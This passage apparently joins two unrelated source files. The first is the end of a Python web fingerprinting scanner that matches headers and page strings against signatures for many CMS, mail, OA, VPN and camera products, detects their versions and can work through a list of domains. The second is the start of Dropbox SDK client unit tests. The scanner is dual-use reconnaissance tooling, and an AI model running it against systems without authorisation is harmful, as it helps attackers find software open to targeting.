("magicwinmail", "http://www.magicwinmail.com", "8/27/2014", [{"header": ["magicwinmail_default_theme"]}]),
("EasyTrace(botwave)", "http://www.botwave.com/products/easytrace/solution.html", "8/27/2014",
[{"title": ["EasyTrace"], "body": ["login_page"]}]),
("WishOA", "http://www.wishtech.com.cn", "8/26/2014", [{"body": ["WishOA_WebPlugin.js"]}]),
("78oa", "http://www.78oa.com/", "8/26/2014",
[{"body": ["/resource/javascript/system/runtime.min.js"]}, {"body": ["license.78oa.com"]}]),
("PHPOA", "http://www.phpoa.cn", "8/26/2014", [{"body": ["admin_img/msg_bg.png"]}]),
("buscape", "http://www.buscape.com.br", "8/26/2014", [{"header": ["sessao3"]}]),
("techbridge", "http://www.techbridge-inc.com/", "8/25/2014", [{"body": ["Sorry,you need to use IE brower"]}]),
("ZendServer", "http://www.zend.com/en/products/server", "8/25/2014", [{"header": ["ZendServer"]}]),
("Z-Blog", "http://www.zblogcn.com/", "8/25/2014",
[{"body": ["strBatchView", "str00"]}, {"body": ["Powered By Z-Blog"]}, {"body": ["generator\" content=\"Z-Blog"]},
{"header": ["Product: Z-Blog"]}]),
("sdcms", "http://www.sdcms.cn", "8/23/2014",
[{"title": ["powered by sdcms"], "body": ["var webroot=", "/js/sdcms.js"]}]),
("disqus", "http://www.disqus.com/", "8/22/2014", [{"body": ["disqus_thread"]}]),
("ujian", "http://www.ujian.cc/", "8/22/2014", [{"body": ["ujian.cc/code/ujian.js"]}]),
("uyan", "http://www.uyan.cc/", "8/22/2014", [{"body": ["uyan.cc/code/uyan.js"]}]),
("jiathis", "http://jiathis.com/", "8/22/2014", [{"body": ["jiathis.com/code/jia.js"]}]),
("eaststorecreeator", "http://www.easystorecreator.com/", "8/22/2014", [{"header": ["easystorecreator1"]}]),
("cloudflare", "https://www.cloudflare.com/", "8/21/2014", [{"header": ["cloudflare-nginx"]}]),
("Telerik Sitefinity", "http://www.sitefinity.com/", "8/11/2014",
[{"body": ["Telerik.Web.UI.WebResource.axd"]}, {"body": ["content=\"Sitefinity"]}]),
("Liferay", "http://www.liferay.com", "8/11/2014", [{"header": ["Liferay-Portal"]}]),
("iAPPS", "http://www.iapps.com/products/iapps-content-manager", "8/11/2014", [{"header": ["iAPPSCookie"]}]),
("ExpressionEngine", "https://ellislab.com/expressionengine/", "8/11/2014", [{"header": ["exp_tracker"]}]),
("Parallels Plesk Panel", "http://www.parallels.com/products/plesk/", "8/11/2014",
[{"body": ["Parallels IP Holdings GmbH"]}]),
("Plesk", "http://sp.parallels.com/products/plesk/", "8/11/2014", [{"header": ["PleskLin"]}]),
("Tumblr", "https://www.tumblr.com/", "8/11/2014", [{"header": ["X-Tumblr-User"]}]),
("Dolibarr", "http://www.dolibarr.org/", "8/11/2014", [{"body": ["Dolibarr Development Team"]}]),
("TurboMail", "http://www.turbomail.org/", "8/1/2014",
[{"body": ["Powered by TurboMail"]}, {"body": ["wzcon1 clearfix"]}, {"title": ["TurboMail邮件系统"]}]),
("GPSweb", "http://ipv6.google.com.hk/#newwindow=1&q=GPSweb", "8/1/2014", [{"title": ["GPSweb"]}]),
("Polycom", "http://support.polycom.com/PolycomService/support/us/support/video/index.html", "7/31/2014",
[{"title": ["Polycom"], "body": ["kAllowDirectHTMLFileAccess"]}]),
("360主机卫士", "http://webscan.360.cn/guard/", "7/30/2014", [{"header": ["X-Safe-Firewall"]}]),
("一启快", "http://www.yiqikuai.com/", "7/30/2014", [{"header": ["yiqikuai.com"]}]),
("主机宝", "http://z.admin5.com/", "7/30/2014", [{"body": ["您访问的是主机宝服务器默认页"]}]),
("srun3000计费认证系统", "http://www.srun.com/", "7/29/2014", [{"title": ["srun3000"]}]),
("网易企业邮箱", "http://qiye.163.com/", "7/29/2014", [{"title": ["邮箱用户登录"], "body": ["frmvalidator"]}]),
("pmway_E4_crm", "http://www.pmway.com/", "7/29/2014", [{"title": ["E4", "CRM"]}]),
("NetShare_VPN", "http://www.zkvpn.com/", "7/29/2014", [{"title": ["NetShare", "VPN"]}]),
("AVCON6", "http://www.epross.com/", "7/29/2014", [{"title": ["AVCON6"]}, {"body": ["language_dispose.action"]}]),
("SonicWALL", "http://www.sonicwall.com/", "7/28/2014", [{"header": ["Server: SonicWALL"]}]),
("亿邮", "http://eyou.net/", "7/28/2014",
[{"body": ["EYOU企业邮箱"]}, {"header": ["eYouWS"]}, {"body": ["cr\">eYouMail"]}, {"header": ["EMPHPSID"]}]),
("MVB2000", "http://www.mvb2000.cn", "7/28/2014", [{"title": ["MVB2000"]}, {"body": ["The Magic Voice Box"]}]),
("dd-wrt", "http://www.dd-wrt.com/", "7/28/2014", [{"body": ["dd-wrt.com", "load average"]}]),
("Sun[tm]", "http://www.oracle.com/us/sun/index.htm", "7/28/2014",
[{"title": ["Sun[tm] ONE Web Server"]}, {"header": ["Server: Sun-ONE-Web-Server"]}]),
("edvr", "http://ipv6.google.com.hk/#newwindow=1&q=EDVS+edvr", "7/28/2014", [{"title": ["edvs/edvr"]}]),
("iDVR", "http://ipv6.google.com.hk/#newwindow=1&q=idvr", "7/28/2014", [{"header": ["Server: iDVRhttpSvr"]}]),
("EdmWebVideo", "http://www.baidu.com/s?wd=EdmWebVideo", "7/28/2014", [{"title": ["EdmWebVideo"]}]),
("webplus", "http://www.sudytech.com/", "7/28/2014", [{"body": ["webplus", "高校网站群管理平台"]}]),
("LuManager", "http://www.zijidelu.org/", "7/28/2014", [{"title": ["LuManager"]}]),
("管理易", "http://www.ekingcn.com/", "7/25/2014", [{"body": ["管理易", "minierp"]}]),
("Coremail", "http://www.coremail.cn/", "7/25/2014",
[{"title": ["/coremail/common/assets"]}, {"title": ["Coremail邮件系统"]}, {"body": ["coremail/common/"]}]),
("用友erp-nc", "http://www.yonyou.com/product/NC.aspx", "7/24/2014",
[{"body": ["/nc/servlet/nc.ui.iufo.login.Index"]}, {"title": ["用友新世纪"]}]),
("supesite", "http://www.comsenz.com/downloads/install/supesite/", "7/23/2014", [{"header": ["supe_sid"]}]),
("同城多用户商城", "http://www.anxin66.com/", "7/23/2014", [{"body": ["style_chaoshi"]}]),
("DIYWAP", "http://www.diywap.cn/", "7/23/2014", [{"body": ["web980", "bannerNum"]}]),
("TCCMS", "http://www.teamcen.com/", "7/23/2014",
[{"title": ["Power By TCCMS"]}, {"body": ["index.php?ac=link_more", "index.php?ac=news_list"]}]),
("Shop7Z", "http://www.shop7z.com/", "7/22/2014",
[{"header": ["sitekeyword"]}, {"body": ["productlist.asp", "headlist"]}]),
("IdeaCMS", "http://www.ideacms.net/", "7/22/2014", [{"body": ["Powered By IdeaCMS"]}, {"body": ["m_ctr32"]}]),
("emlog", "http://www.emlog.net/", "7/22/2014", [{"body": ["content=\"emlog\""]}]),
("phpshe", "http://www.phpshe.com", "7/16/2014", [{"body": ["phpshe"]}]),
("华天动力OA(OA8000)", "http://www.oa8000.com", "7/16/2014", [{"body": ["/OAapp/WebObjects/OAapp.woa"]}]),
("ThinkSAAS", "http://www.thinksaas.cn", "7/16/2014", [{"body": ["/app/home/skins/default/style.css"]}]),
("e-tiller", "http://www.e-tiller.com", "7/16/2014", [{"body": ["reader/view_abstract.aspx"]}]),
(
"mongodb", "http://www.mongodb.org", "7/11/2014", [{"body": ["<a href=\"/_replSet\">Replica set status</a></p>"]}]),
("易瑞授权访问系统", "http://www.infcn.com.cn/iras/752.jhtml", "7/9/2014",
[{"body": ["/authjsp/login.jsp"]}, {"body": ["FE0174BB-F093-42AF-AB20-7EC621D10488"]}]),
("fangmail", "http://www.fangmail.net/", "7/9/2014", [{"body": ["/fangmail/default/css/em_css.css"]}]),
("腾讯企业邮箱", "http://exmail.qq.com/", "7/9/2014", [{"body": ["/cgi-bin/getinvestigate?flowid="]}]),
("通达OA", "http://www.tongda2000.com/", "7/9/2014",
[{"body": ["<link rel=\"shortcut icon\" href=\"/images/tongda.ico\" />"]},
{"body": ["OA提示:不能登录OA", "紧急通知:今日10点停电"]}, {"body": ["Office Anywhere 2013"]}]),
("jira", "https://www.atlassian.com/software/jira", "7/8/2014",
[{"body": ["jira.webresources"]}, {"header": ["atlassian.xsrf.token"]}, {"body": ["ams-build-number"]},
{"body": ["com.atlassian.plugins"]}]),
("fisheye", "https://www.atlassian.com/software/fisheye/overview", "7/8/2014",
[{"header": ["Set-Cookie: FESESSIONID"]}, {"body": ["fisheye-16.ico"]}]),
("elasticsearch", "http://www.elasticsearch.org/", "7/7/2014",
[{"body": ["You Know, for Search"]}, {"header": ["application/json"], "body": ["build_hash"]}]),
("MDaemon", "http://www.altn.com/Products/MDaemon-Email-Server-Windows/", "7/7/2014",
[{"body": ["/WorldClient.dll?View=Main"]}]),
("ThinkPHP", "http://www.thinkphp.cn", "7/3/2014", [{"header": ["thinkphp"]}, {"header": ["think_template"]}]),
("OA(a8/seeyon/ufida)", "http://yongyougd.com/productsview88.html", "7/1/2014",
[{"body": ["/seeyon/USER-DATA/IMAGES/LOGIN/login.gif"]}]),
("yongyoufe", "http://yongyougd.com/productsview88.html", "7/1/2014",
[{"title": ["FE协作"]}, {"body": ["V_show", "V_hedden"]}]),
("Zen Cart", "http://www.zen-cart.com/", "12/18/2013",
[{"body": ["shopping cart program by Zen Cart"]}, {"header": ["Set-Cookie: zenid="]}]),
("iWebShop", "http://www.jooyea.cn/", "12/18/2013",
[{"body": ["Powered by", "iWebShop"]}, {"header": ["iweb_safecode"]}, {"body": ["/runtime/default/systemjs"]}]),
("DouPHP", "http://www.douco.com/", "12/18/2013",
[{"body": ["Powered by DouPHP"]}, {"body": ["controlBase", "indexLeft", "recommendProduct"]}]),
("twcms", "http://www.twcms.cn/", "12/18/2013", [{"body": ["/twcms/theme/", "/css/global.css"]}]),
("Cicro", "http://www.cicro.com/", "12/3/2013",
[{"body": ["Cicro", "CWS"]}, {"body": ["content=\"Cicro"]}, {"body": ["index.files/cicro_userdefine.css"]},
{"body": ["structure/index", "window.location.href="]}]),
("SiteServer", "http://www.siteserver.cn/", "11/29/2013",
[{"body": ["Powered by", "http://www.siteserver.cn", "SiteServer CMS"]}, {"title": ["Powered by SiteServer CMS"]},
{"body": ["T_系统首页模板"]}, {"body": ["siteserver", "sitefiles"]}]),
("Joomla", "http://www.Joomla.org", "11/28/2013",
[{"body": ["content=\"Joomla"]}, {"body": ["/media/system/js/core.js", "/media/system/js/mootools-core.js"]}]),
("phpbb", "http://www.phpbb.com/", "11/28/2013",
[{"header": ["Set-Cookie: phpbb3_"]}, {"header": ["HttpOnly, phpbb3_"]},
{"body": ["©", "http://www.longluntan.com/zh/phpbb/", "phpBB"]}, {"body": ["phpBB Group\" /\>"]},
{"body": ["START QUICK HACK - phpBB Statistics MOD"]}]),
("HDWiki", "http://kaiyuan.hudong.com/", "11/26/2013",
[{"title": ["powered by hdwiki!"]}, {"body": ["content=\"HDWiki"]},
{"body": ["http://kaiyuan.hudong.com?hf=hdwiki_copyright_kaiyuan"]}, {"header": ["hd_sid="]}]),
("kesionCMS", "http://www.kesion.com/", "11/25/2013",
[{"body": ["/ks_inc/common.js"]}, {"body": ["publish by KesionCMS"]}]),
("CMSTop", "http://www.cmstop.com/", "11/23/2013",
[{"body": ["/css/cmstop-common.css"]}, {"body": ["/js/cmstop-common.js"]}, {"body": ["cmstop-list-text.css"]},
{"body": ["<a class=\"poweredby\" href=\"http://www.cmstop.com\""]}]),
("ESPCMS", "http://www.ecisp.cn/", "11/23/2013", [{"title": ["Powered by ESPCMS"]}, {"body": ["Powered by ESPCMS"]},
{"body": ["infolist_fff",
"/templates/default/style/tempates_div.css"]}]),
("74cms", "http://www.74cms.com/", "11/23/2013", [{"body": ["content=\"74cms.com"]}, {"body": ["content=\"骑士CMS"]},
{"body": ["Powered by <a href=\"http://www.74cms.com/\""]}, {
"body": ["/templates/default/css/common.css",
"selectjobscategory"]}]),
("Foosun", "http://www.foosun.net/", "11/21/2013", [{"body": ["Created by DotNetCMS"]}, {"body": ["For Foosun"]}, {
"body": ["Powered by www.Foosun.net,Products:Foosun Content Manage system"]}]),
("PhpCMS", "http://www.phpcms.com/", "11/21/2013",
[{"body": ["Powered by", "http://www.phpcms.cn"]}, {"body": ["content=\"Phpcms"]},
{"body": ["Powered by", "phpcms"]}]),
("Hanweb", "http://www.hanweb.com/", "11/21/2013",
[{"body": ["Produced By 大汉网络"]}, {"body": ["/jcms_files/jcms"]}, {"body": ["<meta name='Author' content='大汉网络'>"]},
{"body": ["<meta name='Generator' content='大汉版通'>"]},
{"body": ["<a href='http://www.hanweb.com' style='display:none'>"]}]),
("Drupal", "http://www.drupal.org/", "11/21/2013",
[{"header": ["X-Generator: Drupal"]}, {"body": ["content=\"Drupal"]}, {"body": ["jQuery.extend(Drupal.settings"]},
{"body": ["/sites/default/files/", "content=\"/sites/all/modules/", "/sites/all/themes/"]}]),
("phpwind", "http://www.phpwind.net/", "11/19/2013",
[{"title": ["Powered by phpwind"]}, {"body": ["content=\"phpwind"]}]),
("Discuz", "http://www.discuz.net/", "11/19/2013",
[{"title": ["Powered by Discuz"]}, {"body": ["content=\"Discuz"]}, {"body": ["discuz_uid", "portal.php?mod=view"]},
{"body": ["Powered by <strong><a href=\"http://www.discuz.net"]}]),
("vBulletin", "http://www.vBulletin.com/", "11/19/2013",
[{"title": ["Powered by vBulletin"], "body": ["content=\"vBulletin"]},
{"header": ["bbsessionhash", "bblastvisit"]}, {"body": ["Powered by vBulletin™"]}]),
("cmseasy", "http://www.cmseasy.cn/", "11/19/2013",
[{"title": ["Powered by CmsEasy"]}, {"header": ["http://www.cmseasy.cn/service_1.html"]},
{"body": ["content=\"CmsEasy"]}]),
("wordpress", "http://www.wordpress.com/", "11/19/2013",
[{"body": ["content=\"WordPress"]}, {"header": ["X-Pingback", "/xmlrpc.php"], "body": ["/wp-includes/"]}]),
("DedeCMS", "http://www.dedecms.com/", "11/19/2013",
[{"body": ["Power by DedeCms"]}, {"body": ["Powered by", "http://www.dedecms.com/", "DedeCMS"]},
{"body": ["/templets/default/style/dedecms.css"]}]),
("ASPCMS", "http://www.aspcms.com/", "11/19/2013",
[{"title": ["Powered by ASPCMS"]}, {"body": ["content=\"ASPCMS"]}, {"body": ["/inc/AspCms_AdvJs.asp"]}]),
("MetInfo", "http://www.metinfo.com/", "11/19/2013",
[{"title": ["Powered by MetInfo"]}, {"body": ["content=\"MetInfo"]}, {"body": ["powered_by_metinfo"]},
{"body": ["/images/css/metinfo.css"]}]),
("PageAdmin", "http://www.pageadmin.net/", "11/19/2013",
[{"title": ["Powered by PageAdmin"]}, {"body": ["content=\"PageAdmin"]},
{"body": ["Powered by <a href='http://www.pageadmin.net'"]}, {"body": ["/e/images/favicon.ico"]}]),
("Npoint", "http://www.npointhost.com/", "11/19/2013", [{"title": ["Powered by Npoint"]}]),
("小蚂蚁", "http://www.xiaomayi.co/", "11/19/2013",
[{"title": ["Powered by 小蚂蚁地方门户网站系统"]}, {"header": ["AntXiaouserslogin"]},
{"body": ["/Template/Ant/Css/AntHomeComm.css"]}]),
("捷点JCMS", "http://www.jcms.com.cn/", "11/19/2013", [{"body": ["Publish By JCms2010"]}]),
("帝国CMS", "http://www.phome.net/", "11/19/2013",
[{"title": ["Powered by EmpireCMS"]}, {"body": ["/skin/default/js/tabs.js"]},
{"body": ["/e/member/login/loginjs.php"]}]),
("phpMyadmin", "http://www.phpmyadmin.net/", "11/19/2013",
[{"header": ["Set-Cookie: phpMyAdmin="]}, {"title": ["phpMyAdmin "]}, {"body": ["pma_password"]}]),
("JEECMS", "http://www.jeecms.com/", "11/19/2013",
[{"title": ["Powered by JEECMS"]}, {"body": ["Powered by", "http://www.jeecms.com", "JEECMS"]},
{"body": ["/r/cms/www/", "jhtml"]}]),
("IdeaWebServer", "#", "6/4/2015 00:37:30", [{"header": ["IdeaWebServer"]}]),
("Struts2", "http://struts.apache.org/", "6/4/2015",
[{"header": ["JSESSIONID"], "body": [".action"]}, {"body": ["Struts Problem Report"]},
{"body": ["There is no Action mapped for namespace"]},
{"body": ["No result defined for action and result input"]}]),
("AXIS 2120网络摄像头", "http://www.axis.com/cn/zh-hans/products/axis-2120", "6/8/2015 16:13:02",
[{"title": ["AXIS 2120 Network Camera"]}]),
("东方通中间件", "http://www.tongtech.com/", "6/12/2015", [{"header": ["TongWeb Server"]}]),
("金蝶中间件Apusic", "http://www.apusic.com/", "6/12/2015", [{"header": ["Apusic"]}]),
("Ektron", "http://www.ektron.com", "21/12/2015", [{"body": ["id=\"Ektron"]}]),
# ("JQuery","http://jquery.com/","8/21/2014",[{"body":["jquery"]}]),
# ("JQuery-UI","http://jqueryui.com","9/4/2014",[{"body":["jquery-ui"]}]),
# ("bootstrap","http://getbootstrap.com/","8/21/2014",[{"body":["bootstrap.css"]},{"body":["bootstrap.min.css"]}]),
# ("google-analytics","http://www.google.com/analytics/","8/21/2014",[{"body":["google-analytics.com/ga.js"]},{"body":["google-analytics.com/analytics.js"]}]),
# ("__VIEWSTATE","http://msdn.microsoft.com/en-us/library/ms972976.aspx","10/4/2014",[{"body":["__VIEWSTATE"]}]),
# ("Angularjs","http://www.angularjs.org/","6/6/2015",[{"body":["angularjs"]}]),
# ("sogou站长平台","http://zhanzhang.sogou.com/","8/22/2014",[{"body":["sogou_site_verification"]}]),
# ("51la","http://www.51.la/","8/22/2014",[{"body":["js.users.51.la"]}]),
# ("baidu统计","http://tongji.baidu.com/","8/22/2014",[{"body":["hm.baidu.com/h.js"]}]),
# ("baidu站长平台","http://zhanzhang.baidu.com/?castk=LTE%3D","8/22/2014",[{"body":["baidu-site-verification"]}]),
# ("360站长平台","http://zhanzhang.so.com/","8/22/2014",[{"body":["360-site-verification"]}]),
# ("百度分享","http://share.baidu.com/","8/22/2014",[{"body":["share.baidu.com/static/api/js/share.js"]}]),
# ("squid","http://www.squid-cache.org/","8/28/2014",[{"header":["squid"]}]),
# ("CNZZ统计","http://cnzz.com","8/28/2014",[{"body":["cnzz.com/stat.php?id="]}]),
# ("安全宝","http://www.anquanbao.com/","8/28/2014",[{"header":["X-Powered-By-Anquanbao"]}]),
# ("360网站卫士","http://wangzhan.360.cn/","8/28/2014",[{"header":["360wzb"]}]),
# ("mod_wsgi","http://code.google.com/p/modwsgi","10/8/2014",[{"header":["mod_wsgi"]}]),
# ("mod_ssl","http://modssl.org","10/8/2014",[{"header":["mod_ssl"]}]),
# ("mod_rails","http://phusionpassenger.com","10/8/2014",[{"header":["mod_rails"]}]),
# ("mod_rack","http://phusionpassenger.com","10/8/2014",[{"header":["mod_rack"]}]),
# ("mod_python","http://www.modpython.org","10/8/2014",[{"header":["mod_python"]}]),
# ("mod_perl","http://perl.apache.org","10/8/2014",[{"header":["mod_perl"]}]),
# ("mod_jk","http://tomcat.apache.org/tomcat-3.3-doc/mod_jk-howto.html","10/8/2014",[{"header":["mod_jk"]}]),
# ("mod_fastcgi","http://www.fastcgi.com/mod_fastcgi/docs/mod_fastcgi.html","10/8/2014",[{"header":["mod_fastcgi"]}]),
# ("mod_auth_pam","http://pam.sourceforge.net/mod_auth_pam","10/8/2014",[{"header":["mod_auth_pam"]}]),
# ("百度云加速","http://yunjiasu.baidu.com/","8/28/2014",[{"header":["X-Server","fhl"]}]),
# ("加速乐","http://www.jiasule.com/","8/28/2014",[{"header":["__jsluid"]}]),
]
cmsver = {
"wordpress": ('/', r'<meta\s*name="generator"\s*content="WordPress\s*([\d\.]*)"\s/>'),
"Drupal": ('/CHANGELOG.txt', r'Drupal ([\d]+.[\d]+[.[\d]+]*, [\d]{4}-[\d]{2}-[\d]{2})'),
"Joomla": ('/modules/mod_login/mod_login.xml', r'<version>(.+)</version>'),
"IIS": ('/', r'Microsoft-IIS/([\d\.]+)'),
"Privoxy": ('/', r'Privoxy\s*([\w\.]+)'),
"ExtMail": ('/', r'ExtMail\s*Pro\s*([\w\.]+)'),
"GlassFish": ('/', r':\s*GlassFish\s*Server\s*Open\s*Source\s*Edition\s\s*([\w\.]+)'),
"qibosoft": ('/', r'>qibosoft\s*([\w\.]+)'),
"UcSTAR": ('/', r'">\S(V.*)</'),
"FineCMS": ('/', r'FineCMS\s*([\w\.]+)"\s*>'),
"Maticsoft_Shop_动软商城": ('/', r'Maticsoft\s*Shop\s*([\w\.]+)'),
"hishop": ('/', r'Hishop:\s*([\w\.]+)'),
"Tipask": ('/', r'"generator"\s*content="Tipask\s*([\w\.]+)'),
"地平线CMS": ('/', r'Powered\s*by\s*deepsoon\s*cms\s*version\s*([\w\.]+)\s'),
"BoyowCMS": ('/', r'BoyowCMS\s*([\w\.]+)'),
"mod_python": ('/', r'\s*mod_python\s*/([\w\.]+)\s'),
"mod_perl/1.22": ('/', r'mod_perl/([\w\.]+)'),
"mod_jk": ('/', r'mod_jk/([\w\.]+)'),
"mod_fastcgi": ('/', r'mod_perl/([\w\.]+)'),
"mod_auth_pam": ('/', r'mod_auth_pam/([\w\.]+)'),
"Communique": ('/', r'Communique/([\w\.]+)'),
"Z-BlogPHP": ('/', r'Z-BlogPHP\s*([\w\.]+)'),
"护卫神网站安全系统": ('/', r'<title>护卫神.网站安全系统(V.*)</title>'),
"Allegro-Software-RomPager": ('/', r'Allegro-Software-RomPager/([\w\.]+)'),
"HFS": ('/', r'Server:\s*HFS\s*(.*?)beta'),
"ecshop": ('/', r'ECSHOP\s*(.*?)\s*/>'),
"gunicorn": ('/', r'gunicorn/([\w\.]*)'),
"WebKnight": ('/', r'WebKnight/([\w\.]*)'),
"FortiWeb": ('/', r'FortiWeb-([\w\.]*)'),
"Mod_Security": ('/', r'Mod_Security\s*([\w\.]*)'),
"DnP Firewall": ('/', r'DnP\s*Firewall.*\s*([\w\.]+).*copy'),
"AnZuWAF": ('/', r'AnZuWAF/([\w\.]+)'),
"Safe3WAF": ('/', r'Safe3WAF/([\w\.]+)'),
"mod_auth_passthrough": ('/', r'mod_auth_passthrough/([\w\.]+)'),
"mod_bwlimited": ('/', r'mod_bwlimited/([\w\.]+)'),
"OpenSSL": ('/', r'OpenSSL/([\w\.]+)'),
"Alternate-Protocol": ('/', r'Alternate-Protocol:\s*npn-spdy/([\w\.]+)'),
"pagespeed": ('/', r'X-Mod-Pagespeed:\s*([\w\.]+)'),
"Cocoon": ('/', r'X-Cocoon-Version:\s*([\w\.]+)'),
"Kooboocms": ('/', r'X-KoobooCMS-Version:\s*([\w\.]+)'),
"plone": ('/', r'Plone/([\w\.]+)'),
"Powercdn": ('/', r'PowerCDN/([\w\.]+)\s*'),
"Iisexport": ('/', r'IIS\s*Export\s*([\w\.]+) '),
"DotNetNuke": ('/', r'DotNetNuke\s*Error:\s*-\s*Version(.*)</'),
"Aspnetmvc": ('/', r'X-AspNetMvc-Version:\s*([\w\.]+)'),
"perl": ('/', r'Perl/([\w\.]+)\s*'),
"jsp": ('/', r'JSP/([\w\.]+)\s*'),
"ruby": ('/', r'Ruby/([\w\.]+)\s*'),
"python": ('/', r'Python/([\w\.]+)\s*'),
"PHP": ('/', r'PHP/([\w\.]+)\s*'),
"JQuery-UI": ('/', r'jquery-ui-([\w\.]+)\s*'),
"zabbix": ('/', r'\s*Zabbix\s*([\w\.]+)*\sCopyright'),
"JBoss": ('/', r'JBoss-([\w\.]+)'),
"Oracle-Application-Server": ('/', r':\s*Oracle-Application-Server-10g/([\w\.]+)'),
"Jetty": ('/', r'Jetty/([\w\.]+)'),
"webrick": ('/', r'WEBrick/([\w\.]+)'),
"Phusion": ('/', r'Phusion\s*Passenger\s*([\w\.]+)'),
"Netscape-Enterprise": ('/', r':\s*Netscape-Enterprise/([\w\.]+)'),
"Resin": ('/', r'Resin/([\w\.]+)'),
"Zeus": ('/', r'Zeus/([\w\.]+)'),
"ngx_openresty": ('/', r'ngx_openresty/([\w\.]+)'),
"Microsoft-HTTPAPI": ('/', r''),
"Tengine": ('/', r'Tengine/([\w\.]+)'),
"Apache": ('/', r'Apache/([\w\.]+)'),
"Apache-Tomcat": ('/', r'Apache-Coyote/([\w\.]+)'),
"Nginx": ('/', r'Nginx/([\w\.]+)'),
"squid": ('/', r':\s*squid/([\w\.]+)'),
"ZendServer": ('/', r'ZendServer/([\w\.]+)'),
"Z-Blog": ('/', r'Z-Blog\s*([\w\.]+)'),
"Liferay": ('/', r''),
"fisheye": ('/', r'>FishEye\s*([\w\.]+)'),
"MDaemon": ('/', r'MDaemon\s*([\w\.]+)'),
"DouPHP": ('/', r'DouPHP\s*([\w\.]+)'),
"HDWiki": ('/', r'="*HDWiki\s*([\w\.]+)"'),
"ESPCMS": ('/', r'Powered\s*by\s*ESPCMS\s*([\w\.]+)'),
"Discuz": ('/', r'>Discuz!</a></strong>\s*<em>([\w\.]+)</em></p>'),
"vBulletin": ('/', r'="\s*vBulletin\s*([\w\.]+)"\s*/>'),
"cmseasy": ('/', r'"Generator"\s*content="CmsEasy\s*([\w\.]+)"\s*/>'),
"ASPCMS": ('/', r'content="ASPCMS!\s*([\w\.]+)"\s*'),
"MetInfo": ('/', r'MetInfo</b></a>\s*([\w\.]+)'),
"IdeaWebServer": ('/', r'Server:\s*IdeaWebServer/([\w\.]+)'),
"金蝶中间件Apusic": ('/', r'<TITLE>Apusic\s*Application\s*Server/([\w\.]+)'),
"天柏在线培训/考试系统": ('/Login.aspx', r'KSXTQYB-V(.*)</span>'),
"openEAP": ('/security/login/login.jsp', r'<p.*(open.*?)</'),
"phpwind": ('/robots.txt', r'Version\s*([\w\.]+)'),
"DedeCMS": ('/data/admin/ver.txt', r'(.*)'),
"Ektron": ('/Workarea/version.xml', r'<CMS400 DATE="[\d\-]+">([\w\.]+)</CMS400>\s*</installation>'),
}
class Cmsfinger(Tasker):
id = 0
lock = threading.RLock()
def __init__(self, resource):
Tasker.__init__(self, resource)
def taskprocesser(self, task):
Cmsfinger.lock.acquire()
Cmsfinger.id = Cmsfinger.id + 1
Cmsfinger.lock.release()
req = HttpSession()
if not req.Get(task):
return
result = {}
headers = str(req.headers)
for line in fingers:
allfingers = line[3]
for onefinger in allfingers:
bMatch = True
for key in onefinger:
if key == 'header':
for r in onefinger[key]:
if headers.find(r) < 0:
bMatch = False
break
if not bMatch:
break
if not bMatch:
break
if key == 'title' or key == 'body':
for r in onefinger[key]:
if req.html.find(r) < 0:
bMatch = False
break
if not bMatch:
break
if not bMatch:
break
if bMatch:
result[line[0]] = ''
break
for cms in result:
if cms in cmsver:
if cmsver[cms][0] == '/':
m = re.search(cmsver[cms][1], req.html)
if not m:
m = re.search(cmsver[cms][1], headers)
result[cms] = m.group(1) if m else 'unkown'
else:
tmpreq = HttpSession(task.strip('/') + cmsver[cms][0])
if tmpreq.Get():
m = re.search(cmsver[cms][1], tmpreq.html)
if not m:
m = re.search(cmsver[cms][1], str(tmpreq.headers))
result[cms] = m.group(1) if m else 'unkown'
if len(result) == 0:
Log.file('"unkown","%s"' % task, Log.YELLOW)
else:
Log.file('"%s","%s"' % (task, result))
def resolvetask(self, task):
if task[0:4] != 'http':
return ['http://' + task]
else:
return [task]
def help():
print('this.py www.baidu.com')
print('this.py -r domainlist.txt')
if __name__ == "__main__":
Log.INIT()
Log.FILE = sys.path[0] + '\\cms-finger-log.txt'
if len(sys.argv) == 1:
help()
elif len(sys.argv) == 2:
b = Cmsfinger([sys.argv[1]])
b.run()
elif len(sys.argv) == 3 and sys.argv[1] == '-r':
b = Cmsfinger(sys.argv[2])
b.run()
else:
help()
|
test_client.py
|
#!/usr/bin/env python
from __future__ import with_statement
from StringIO import StringIO
import unittest
import os
import posixpath
import sys
import threading
from uuid import UUID
from dropbox import session, client
import datetime
from dropbox.rest import ErrorResponse
try:
import json
except ImportError:
import simplejson as json
PY3 = sys.version_info[0] == 3
class BaseClientTests(object):
@classmethod
def setUpClass(cls):
"""Creates the API client and decides on a test directory."""
cls.client = cls._create_client()
cls.test_dir = "/" + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
test_file_dir = os.path.join(os.path.dirname(__file__), "..", "testfiles")
test_file_dir = os.path.realpath(test_file_dir)
cls.foo = os.path.join(test_file_dir, "foo.txt")
cls.frog = os.path.join(test_file_dir, "Costa Rican Frog.jpg")
cls.song = os.path.join(test_file_dir, "dropbox_song.mp3")
@classmethod
def tearDownClass(cls):
cls.client.file_delete(cls.test_dir)
def setUp(self):
# Hack to run setUpClass() for Python 2.6.
# (It's not worth running tearDownClass(), so you'll have some
# garbage in your app folder.)
if not hasattr(self, 'client'):
self.setUpClass()
def upload_file(self, src, target, **kwargs):
with open(src, 'rb') as f:
return self.client.put_file(target, f, **kwargs)
def dict_has(self, dictionary, *args, **kwargs):
"""Convenience method to check if a dictionary contains the specified
keys and key-value pairs"""
for key in args:
self.assertTrue(key in dictionary)
for (key, value) in kwargs.items():
self.assertEqual(value, dictionary[key])
def assert_file(self, dictionary, filename, *args, **kwargs):
import os
defaults = dict(
bytes = os.path.getsize(filename),
is_dir = False
)
combined = dict(defaults.items() + kwargs.items())
self.dict_has(dictionary, *args,
**combined
)
def test_account_info(self):
"""Tests if the account_info returns the expected fields."""
account_info = self.client.account_info()
self.dict_has(account_info,
"country",
"display_name",
"referral_link",
"quota_info",
"uid"
)
def test_put_file(self):
"""Tests if put_file returns the expected metadata"""
def test_put(file, path):
file_path = posixpath.join(self.test_dir, path)
f = open(file, "rb")
metadata = self.client.put_file(file_path, f)
self.assert_file(metadata, file, path = file_path)
test_put(self.foo, "put_foo.txt")
test_put(self.song, "put_song.mp3")
test_put(self.frog, "put_frog.jpg")
def test_put_file_overwrite(self):
"""Tests if put_file with overwrite=true returns the expected metadata"""
path = posixpath.join(self.test_dir, "foo_overwrite.txt")
self.upload_file(self.foo, path)
f = StringIO("This Overwrites")
metadata = self.client.put_file(path, f, overwrite=True)
self.dict_has(metadata,
size = "15 bytes",
bytes = 15,
